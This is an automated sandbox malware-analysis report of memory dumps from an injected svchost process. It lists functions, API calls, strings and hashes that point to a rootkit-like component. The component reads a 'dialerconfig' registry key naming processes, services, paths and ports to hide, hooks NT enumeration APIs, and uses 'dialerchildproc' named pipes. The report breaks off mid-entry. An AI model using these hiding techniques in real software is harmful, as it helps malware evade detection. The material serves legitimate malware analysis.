ntdll.dll, xrefs: 000002917C3B2D79
NtQueryObject, xrefs: 000002917C3B2D8B

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: de18c3f2bb1e9422b73b247cfda7fe031dcc69be369119bdbcb6686f6340cbbf
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 6DB18072310A9381FBA49FA7D44ABE9E3A4FB44B84F545116EE0A53B94DF39C960C360

Function 000002917C972CDC Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 000002917C972D80
lstrlenW.KERNEL32 ref: 000002917C972FBA

Part of subcall function 000002917C971A14: OpenProcess.KERNEL32 ref: 000002917C971A3A
Part of subcall function 000002917C971A14: K32GetModuleFileNameExW.KERNEL32 ref: 000002917C971A58
Part of subcall function 000002917C971A14: PathFindFileNameW.SHLWAPI ref: 000002917C971A67
Part of subcall function 000002917C971A14: lstrlenW.KERNEL32 ref: 000002917C971A73
Part of subcall function 000002917C971A14: StrCpyW.SHLWAPI ref: 000002917C971A86
Part of subcall function 000002917C971A14: CloseHandle.KERNEL32 ref: 000002917C971A94

GetProcAddress.KERNEL32 ref: 000002917C972D95

Part of subcall function 000002917C971554: StrCmpIW.SHLWAPI ref: 000002917C971585

Part of subcall function 000002917C973930: StrCmpNIW.SHLWAPI ref: 000002917C973948

StrCmpNIW.SHLWAPI ref: 000002917C972DD8
lstrlenW.KERNEL32 ref: 000002917C972F00

Strings

NtQueryObject, xrefs: 000002917C972D8B
ntdll.dll, xrefs: 000002917C972D79
\Device\Nsi, xrefs: 000002917C972DCB

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 04819cb48099a86f5594a0ab167e791b515f4fc142ffadadc1ae4574c5f1d6e1
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 80B18B22222A93C2FBE88FA7C4587FAE3A4FB46B84F545016EE4953794DF35C960C340

Function 000002917C3B7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002917C3B7E8C
RtlCaptureContext.NTDLL ref: 000002917C3B7EB9
RtlLookupFunctionEntry.NTDLL ref: 000002917C3B7ED3
RtlVirtualUnwind.NTDLL ref: 000002917C3B7F14
IsDebuggerPresent.KERNEL32 ref: 000002917C3B7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002917C3B7F89
UnhandledExceptionFilter.KERNEL32 ref: 000002917C3B7F94

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 4e2982e1a579e03856fba74e8153e019d875c04b5551a6ee79dca9dff56c1bc8
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 24317E72305B828AFB708FA6E8453EDB360F785744F44442ADA4E47B98EF38C658C720

Function 000002917C977E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 000002917C977E8C
RtlCaptureContext.NTDLL ref: 000002917C977EB9
RtlLookupFunctionEntry.NTDLL ref: 000002917C977ED3
RtlVirtualUnwind.NTDLL ref: 000002917C977F14
IsDebuggerPresent.KERNEL32 ref: 000002917C977F68
SetUnhandledExceptionFilter.KERNEL32 ref: 000002917C977F89
UnhandledExceptionFilter.KERNEL32 ref: 000002917C977F94

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: a5a3e91584732625ba74e7a49344bbe54e004b8fd5ee4ef132d93c1c18debba2
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 8D316272205B82D6FBA09FA2E8547EEB3A4F785744F44442ADB4D47B98EF38C558C710

Function 000002917C3BB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002917C3BB585
RtlLookupFunctionEntry.NTDLL ref: 000002917C3BB59D
RtlVirtualUnwind.NTDLL ref: 000002917C3BB5D8
IsDebuggerPresent.KERNEL32 ref: 000002917C3BB611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002917C3BB61B
UnhandledExceptionFilter.KERNEL32 ref: 000002917C3BB626

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 0c96960750685fec302c34b3f8663ecc79f570300fb7c2aed73a2559b29a8dfb
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: AB315E32314F8286EB60CF66E8453DEB3A4F789758F500126EA9D43BA9DF38C565CB10

Function 000002917C97B50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 000002917C97B585
RtlLookupFunctionEntry.NTDLL ref: 000002917C97B59D
RtlVirtualUnwind.NTDLL ref: 000002917C97B5D8
IsDebuggerPresent.KERNEL32 ref: 000002917C97B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000002917C97B61B
UnhandledExceptionFilter.KERNEL32 ref: 000002917C97B626

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 7b49fbff93479fdda29496addad81f337dd87c8182d345961adeb9ee9403585f
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: E9315032215F8296EBA0CF66E8443EEB3A4F78A754F500126EA9D43B64DF38C565CB00

Function 000002917C3BFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000002917C3BFF67
WriteFile.KERNEL32 ref: 000002917C3C021E
WriteFile.KERNEL32 ref: 000002917C3C0270
GetLastError.KERNEL32 ref: 000002917C3C0372
GetLastError.KERNEL32 ref: 000002917C3C03D2

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: f612d03db7efcc16af9fea9002cc24e17e430368533c55f3b341c67be3352bbd
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 68E1F072B14AC28AF720CFA6D0892DDBBB1F345788F144116DE5A5BBD9DB38C52AC710

Function 000002917C3B1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002917C3B165B
HeapAlloc.KERNEL32 ref: 000002917C3B166A

Part of subcall function 000002917C3B1274: GetProcessHeap.KERNEL32 ref: 000002917C3B127A
Part of subcall function 000002917C3B1274: HeapAlloc.KERNEL32 ref: 000002917C3B1289
Part of subcall function 000002917C3B1274: GetProcessHeap.KERNEL32 ref: 000002917C3B12A3
Part of subcall function 000002917C3B1274: HeapAlloc.KERNEL32 ref: 000002917C3B12B4

Part of subcall function 000002917C3B1000: GetProcessHeap.KERNEL32 ref: 000002917C3B1006
Part of subcall function 000002917C3B1000: HeapAlloc.KERNEL32 ref: 000002917C3B1015
Part of subcall function 000002917C3B1000: GetProcessHeap.KERNEL32 ref: 000002917C3B1028
Part of subcall function 000002917C3B1000: HeapAlloc.KERNEL32 ref: 000002917C3B1037

RegOpenKeyExW.ADVAPI32 ref: 000002917C3B16DA
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1707
RegCloseKey.ADVAPI32 ref: 000002917C3B1721
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1741
RegCloseKey.ADVAPI32 ref: 000002917C3B175C
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B177C
RegCloseKey.ADVAPI32 ref: 000002917C3B1797
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B17B7
RegCloseKey.ADVAPI32 ref: 000002917C3B17D2
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B17F2
RegCloseKey.ADVAPI32 ref: 000002917C3B180D
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B182D
RegCloseKey.ADVAPI32 ref: 000002917C3B1848
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B1868
RegCloseKey.ADVAPI32 ref: 000002917C3B1883
RegOpenKeyExW.ADVAPI32 ref: 000002917C3B18A3
RegCloseKey.ADVAPI32 ref: 000002917C3B18BE
RegCloseKey.ADVAPI32 ref: 000002917C3B18C8

Part of subcall function 000002917C3B12C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002917C3B1326
Part of subcall function 000002917C3B12C8: GetProcessHeap.KERNEL32 ref: 000002917C3B1334
Part of subcall function 000002917C3B12C8: HeapAlloc.KERNEL32 ref: 000002917C3B1345
Part of subcall function 000002917C3B12C8: RegEnumValueW.ADVAPI32 ref: 000002917C3B13A1
Part of subcall function 000002917C3B12C8: GetProcessHeap.KERNEL32 ref: 000002917C3B13E9
Part of subcall function 000002917C3B12C8: HeapAlloc.KERNEL32 ref: 000002917C3B13F7
Part of subcall function 000002917C3B12C8: GetProcessHeap.KERNEL32 ref: 000002917C3B141B
Part of subcall function 000002917C3B12C8: HeapFree.KERNEL32 ref: 000002917C3B1429
Part of subcall function 000002917C3B12C8: lstrlenW.KERNEL32 ref: 000002917C3B1432
Part of subcall function 000002917C3B12C8: GetProcessHeap.KERNEL32 ref: 000002917C3B1440
Part of subcall function 000002917C3B12C8: HeapAlloc.KERNEL32 ref: 000002917C3B144E

Strings

paths, xrefs: 000002917C3B17B0
tcp_local, xrefs: 000002917C3B1826
process_names, xrefs: 000002917C3B1775
service_names, xrefs: 000002917C3B17EB
udp, xrefs: 000002917C3B189C
startup, xrefs: 000002917C3B16FD
tcp_remote, xrefs: 000002917C3B1861
SOFTWARE\dialerconfig, xrefs: 000002917C3B16BA
pid, xrefs: 000002917C3B173A

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: 6f6f03aa49396c289d864ba6f61ed6f587c25bd333f5821ff2ea26dbe766cb94
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: F371F536310E5386FB609FA7E89A6DDB7B5FB88B88F001111DA4E47B68DF28C465C710

Function 000002917C971650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000002917C97165B
HeapAlloc.KERNEL32 ref: 000002917C97166A

Part of subcall function 000002917C971274: GetProcessHeap.KERNEL32 ref: 000002917C97127A
Part of subcall function 000002917C971274: HeapAlloc.KERNEL32 ref: 000002917C971289
Part of subcall function 000002917C971274: GetProcessHeap.KERNEL32 ref: 000002917C9712A3
Part of subcall function 000002917C971274: HeapAlloc.KERNEL32 ref: 000002917C9712B4

RegOpenKeyExW.ADVAPI32 ref: 000002917C9716DA
RegOpenKeyExW.ADVAPI32 ref: 000002917C971707
RegCloseKey.ADVAPI32 ref: 000002917C971721
RegOpenKeyExW.ADVAPI32 ref: 000002917C971741
RegCloseKey.ADVAPI32 ref: 000002917C97175C
RegOpenKeyExW.ADVAPI32 ref: 000002917C97177C
RegCloseKey.ADVAPI32 ref: 000002917C971797
RegOpenKeyExW.ADVAPI32 ref: 000002917C9717B7
RegCloseKey.ADVAPI32 ref: 000002917C9717D2
RegOpenKeyExW.ADVAPI32 ref: 000002917C9717F2
RegCloseKey.ADVAPI32 ref: 000002917C97180D
RegOpenKeyExW.ADVAPI32 ref: 000002917C97182D
RegCloseKey.ADVAPI32 ref: 000002917C971848
RegOpenKeyExW.ADVAPI32 ref: 000002917C971868
RegCloseKey.ADVAPI32 ref: 000002917C971883
RegOpenKeyExW.ADVAPI32 ref: 000002917C9718A3
RegCloseKey.ADVAPI32 ref: 000002917C9718BE
RegCloseKey.ADVAPI32 ref: 000002917C9718C8

Part of subcall function 000002917C9712C8: RegQueryInfoKeyW.ADVAPI32 ref: 000002917C971326
Part of subcall function 000002917C9712C8: GetProcessHeap.KERNEL32 ref: 000002917C971334
Part of subcall function 000002917C9712C8: HeapAlloc.KERNEL32 ref: 000002917C971345
Part of subcall function 000002917C9712C8: RegEnumValueW.ADVAPI32 ref: 000002917C9713A1
Part of subcall function 000002917C9712C8: GetProcessHeap.KERNEL32 ref: 000002917C9713E9
Part of subcall function 000002917C9712C8: HeapAlloc.KERNEL32 ref: 000002917C9713F7
Part of subcall function 000002917C9712C8: GetProcessHeap.KERNEL32 ref: 000002917C97141B
Part of subcall function 000002917C9712C8: HeapFree.KERNEL32 ref: 000002917C971429
Part of subcall function 000002917C9712C8: lstrlenW.KERNEL32 ref: 000002917C971432
Part of subcall function 000002917C9712C8: GetProcessHeap.KERNEL32 ref: 000002917C971440
Part of subcall function 000002917C9712C8: HeapAlloc.KERNEL32 ref: 000002917C97144E

Strings

SOFTWARE\dialerconfig, xrefs: 000002917C9716BA
paths, xrefs: 000002917C9717B0
tcp_remote, xrefs: 000002917C971861
udp, xrefs: 000002917C97189C
tcp_local, xrefs: 000002917C971826
service_names, xrefs: 000002917C9717EB
startup, xrefs: 000002917C9716FD
pid, xrefs: 000002917C97173A
process_names, xrefs: 000002917C971775

Memory Dump Source

Source File: 0000001D.00000002.2687432521.000002917C970000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C970000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c970000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: eabd25cbee0ba6b4bb64629f564dd0af8ead6e27b0a4aa91122047340e85a818
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 10710936311E53D6FB909FA6E8586EAA7B4F786B88F405111DE4D97B28DF38C465C300

Function 000002917C3B12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002917C3B1326
GetProcessHeap.KERNEL32 ref: 000002917C3B1334
HeapAlloc.KERNEL32 ref: 000002917C3B1345
RegEnumValueW.ADVAPI32 ref: 000002917C3B13A1

Part of subcall function 000002917C3B1554: StrCmpIW.SHLWAPI ref: 000002917C3B1585

GetProcessHeap.KERNEL32 ref: 000002917C3B13E9
HeapAlloc.KERNEL32 ref: 000002917C3B13F7
GetProcessHeap.KERNEL32 ref: 000002917C3B141B
HeapFree.KERNEL32 ref: 000002917C3B1429
lstrlenW.KERNEL32 ref: 000002917C3B1432
GetProcessHeap.KERNEL32 ref: 000002917C3B1440
HeapAlloc.KERNEL32 ref: 000002917C3B144E
StrCpyW.SHLWAPI ref: 000002917C3B1470
GetProcessHeap.KERNEL32 ref: 000002917C3B1485
HeapFree.KERNEL32 ref: 000002917C3B1493

Strings

d, xrefs: 000002917C3B1365

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 9804424bea62868d5ef40deb71d74422bb9222a12c4e286567af976c7fd0d7f2
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: A95137B2314B4696FB64DFA3E5493DAB3B2F789B80F048124DA8A07B54DF3CC0658B50

Function 000002917C3B1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000002917C3B1EBF

Part of subcall function 000002917C3B2174: GetModuleHandleA.KERNEL32 ref: 000002917C3B218C
Part of subcall function 000002917C3B2174: GetProcAddress.KERNEL32 ref: 000002917C3B219D

Part of subcall function 000002917C3B5C10: GetCurrentThreadId.KERNEL32 ref: 000002917C3B5C4B

Strings

NtQueryDirectoryFileEx, xrefs: 000002917C3B1F3C
NtQueryDirectoryFile, xrefs: 000002917C3B1F1F
NtEnumerateValueKey, xrefs: 000002917C3B1F76
NtDeviceIoControlFile, xrefs: 000002917C3B1FF6
EnumServiceGroupW, xrefs: 000002917C3B1F90
sechost.dll, xrefs: 000002917C3B1FD9
EnumServicesStatusExW, xrefs: 000002917C3B1FB1, 000002917C3B1FD2
ntdll.dll, xrefs: 000002917C3B1ECD
NtQuerySystemInformation, xrefs: 000002917C3B1EE5
NtEnumerateKey, xrefs: 000002917C3B1F59
NtResumeThread, xrefs: 000002917C3B1F02
advapi32.dll, xrefs: 000002917C3B1F97, 000002917C3B1FB8

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 422bfdce62fdaa2b2baba05620e32bb7ecd40122cdf39df78144ed62ae1a6a88
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: A73185B430198BA0FB29EFE7E85FAD8B321A744344F805A13D51D123B59F398669D3B0

Function 000002917C3B23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 000002917C3B2405
GetCurrentProcessId.KERNEL32 ref: 000002917C3B240F

Part of subcall function 000002917C3B19AC: OpenProcess.KERNEL32 ref: 000002917C3B19CA
Part of subcall function 000002917C3B19AC: IsWow64Process.KERNEL32 ref: 000002917C3B19E0
Part of subcall function 000002917C3B19AC: CloseHandle.KERNEL32 ref: 000002917C3B19FB

CreateFileW.KERNEL32 ref: 000002917C3B2468
WriteFile.KERNEL32 ref: 000002917C3B2490
ReadFile.KERNEL32 ref: 000002917C3B24AF
CloseHandle.KERNEL32 ref: 000002917C3B24B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 000002917C3B2438
\\.\pipe\dialerchildproc32, xrefs: 000002917C3B243F

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 44a1c638149df812e22d073717f684dee3f751edebc25dd1814ee88c142079f9
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 4C213D76714B5282F7209B66E5497DEB3A0F389BA4F504215EA5A02FE8CF3CC159CB10

Function 000002917C3B104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000002917C3B10AB
RegEnumValueW.ADVAPI32 ref: 000002917C3B110E
GetProcessHeap.KERNEL32 ref: 000002917C3B1155
HeapAlloc.KERNEL32 ref: 000002917C3B1163
GetProcessHeap.KERNEL32 ref: 000002917C3B1187
HeapFree.KERNEL32 ref: 000002917C3B1195

Strings

d, xrefs: 000002917C3B10CE

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 31007092358e39b0efb50317975e20fbf6607a068d582367e5fdd302f60ff1e8
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: B2418E73214B829BE7608FA3E4497DEB7A1F389B84F008129DB8907B58DF38D165CB50

Function 000002917C3B75F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000002917C3B7618
__scrt_acquire_startup_lock.LIBCMT ref: 000002917C3B766A
_RTC_Initialize.LIBCMT ref: 000002917C3B7698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000002917C3B76BE
__scrt_release_startup_lock.LIBCMT ref: 000002917C3B76E9

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 12db5132529c1d4767bb71d641554eaa13f99c8e936037c6fdc0654bf7dd11e8
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 1B819231B1464386FB64AFEFD84F3E9E290EB87B82F144415A945877D6DB38C9628730

Function 000002917C3B9804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000002917C3B9889
GetLastError.KERNEL32 ref: 000002917C3B9897
LoadLibraryExW.KERNEL32 ref: 000002917C3B98C1
FreeLibrary.KERNEL32 ref: 000002917C3B9907
GetProcAddress.KERNEL32 ref: 000002917C3B9913

Strings

api-ms-, xrefs: 000002917C3B98A9

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 1fd53400cefc79f28e5f0c596c5e5b40acc2e65220aff2a1def9245621025751
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: AC31A332312B5395FE629F93E80A7D9B3A4BB08BA0F194525DD2D4B380EF38C4658720

Function 000002917C3C1B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000002917C3C1BCD
GetLastError.KERNEL32 ref: 000002917C3C1BD9
CloseHandle.KERNEL32 ref: 000002917C3C1BF1
CreateFileW.KERNEL32 ref: 000002917C3C1C1C
WriteConsoleW.KERNEL32 ref: 000002917C3C1C3B

Strings

CONOUT$, xrefs: 000002917C3C1BFD

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: fc9ce431e6f2b7382dee2b938d53d2f6987e3cc16be71361e9614d808f31065a
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 46118E32314B5286F7609B83E84A39DB2A0F388BE4F004214EA5A877D4DF3CC5248750

Function 000002917C3B5C10 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000002917C3B5C4B
GetThreadContext.KERNEL32 ref: 000002917C3B5DB5

Part of subcall function 000002917C3B5A40: GetCurrentThreadId.KERNEL32 ref: 000002917C3B5A44

Memory Dump Source

Source File: 0000001D.00000002.2684972772.000002917C3B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002917C3B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_29_2_2917c3b0000_svchost.jbxd

Similarity

